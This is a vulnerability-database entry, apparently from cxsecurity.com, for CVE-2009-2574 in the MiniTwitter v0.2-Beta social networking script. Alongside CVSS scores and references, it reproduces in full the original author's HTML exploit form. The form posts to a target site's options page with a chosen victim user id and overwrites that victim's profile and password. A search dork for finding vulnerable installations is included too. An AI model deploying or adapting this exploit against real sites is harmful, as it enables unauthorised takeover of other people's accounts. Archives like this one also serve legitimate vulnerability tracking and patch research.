Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
MiniTwitter v0.2-Beta User Options Changer
2009-07-22 / 2009-07-23
Credit:
y3nh4ck3r
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2009-2574
CWE:
CWE-264
Ogólna skala CVSS:
6.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Jednorazowa
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
<!-- ----------------------------------------------------------------- USER OPTIONS CHANGER EXPLOIT --MiniTwitter v0.2-Beta+-> ----------------------------------------------------------------- CMS INFORMATION: +->WEB: http://mt.bioscriptsdb.com/ +->DOWNLOAD: http://sourceforge.net/projects/minitt/ +->DEMO: http://www.bioscripts.net/minitwitter/index.php +->CATEGORY: Social Networking +->DESCRIPTION: Your business needs a private twitter. You can add... several twitters account and use this twitter as a buckup of all... +->RELEASED: 2009-04-30 CMS VULNERABILITY: +->TESTED ON: firefox 3 +->DORK: "BioScripts" +->CATEGORY: OPTIONS CHANGER +->AFFECT VERSION: <= 0.2 Beta +->Discovered Bug date: 2009-04-30 +->Reported Bug date: 2009-04-30 +->Fixed bug date: 2009-05-01 +->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/ +->Author: YEnH4ckEr +->mail: y3nh4ck3r[at]gmail[dot]com +->WEB/BLOG: N/A +->COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su apoyo. +->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) --> <html> <title> MiniTwitter <= v-0.2-Beta--by-y3nh4ck3r--> </title> <body bgcolor=#000000 text=#ffffff> <font color=#ff0000> <h1> MiniTwitter <= v-0.2-Beta--> USER OPTIONS CHANGER EXPLOIT </h1> </font> <font color=#ffff00> <H2> Instructions:<br> 1.- Register in the site.<br> 2.- Choose your configuration and id target. Use to search --> for example: http://[HOST]/[PATH]/index.php?user=1<br> 3.- [HOST]/[PATH] must be configured.<br> </H2> </font> <h4><font color=#ff0000> Notes:<br> [#--->] You cann't change the nick, but search it! <br> [#--->] If password is empty then change everything less password <br> </h4></font> <form action="path" method="post" name="register"> <h2>Configure -->[HOST]/[PATH]:</h2><input name="path" value="http://[HOST]/[PATH]/index.php?go=opt" size="120" type="text"><br> <h2>Target -->id:</h2><input name="id_usr" value="1" size="15" type="text"><br> <h2>Here new options:</h2> <table border="0"> <tr><td>First Name:</td><td><input name="nombre" value="First name" size="50" type="text"><br></td></tr> <tr><td>Second Name:</td><td><input name="apellidos" value="Second name" size="50" type="text"><br></td></tr> <tr><td>Date:</td><td><input name="fechaanio" value="2009" size="4" type="text">-<input name="fechames" value="05" size="2" type="text">-<input name="fechadia" value="1" size="2" type="text"></td></tr> <tr><td>Option bio:</td><td><input name="bio" value="bio" size="50" type="text"><br></td></tr> <tr><td>Country:</td><td><input name="country" value="Spain" size="50" type="text"><br></td></tr> <tr><td>State:</td><td><input name="state" value="Jaen" size="50" type="text"><br></td></tr> <tr><td>Sex:</td><td><input name="sex" value="Man" size="15" type="text"><br></td></tr> <tr><td>Option showing:</td><td><input name="showing" value="showing" size="15" type="text"><br></td></tr> <tr><td>E-mail:</td><td><input name="correo" value="y3nh4ck3r (at) gmail (dot) com [email concealed]" size="100" type="text"><br></td></tr> <tr><td>Password:</td><td><input name="pass1" value="y3nh4ck3r" size="100" type="text"><br></td></tr> <tr><td>Re-Password:</td><td><input name="pass2" value="y3nh4ck3r" size="100" type="text"><br></td></tr> <input name="gravatar" value="111" size="3" type="hidden"> <input name="timeline" value="111" size="3" type="hidden"> </table> <br><input name="submit" value="Change options" onclick="this.form.action=this.form.elements[0].value" type="submit"> </form> </body> <BR><BR> <font color=#ff0000> <h4> Exploit by y3nh4ck3r. Contact: y3nh4ck3r (at) gmail (dot) com [email concealed] </h4> </font> </html> <!-- <<+-----------------------------EOF----------------------------------+>> ENJOY IT!
Referencje:
http://xforce.iss.net/xforce/xfdb/50283
http://www.securityfocus.com/bid/34795
http://www.securityfocus.com/archive/1/archive/1/503157/100/0/threaded
http://www.milw0rm.com/exploits/8587
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top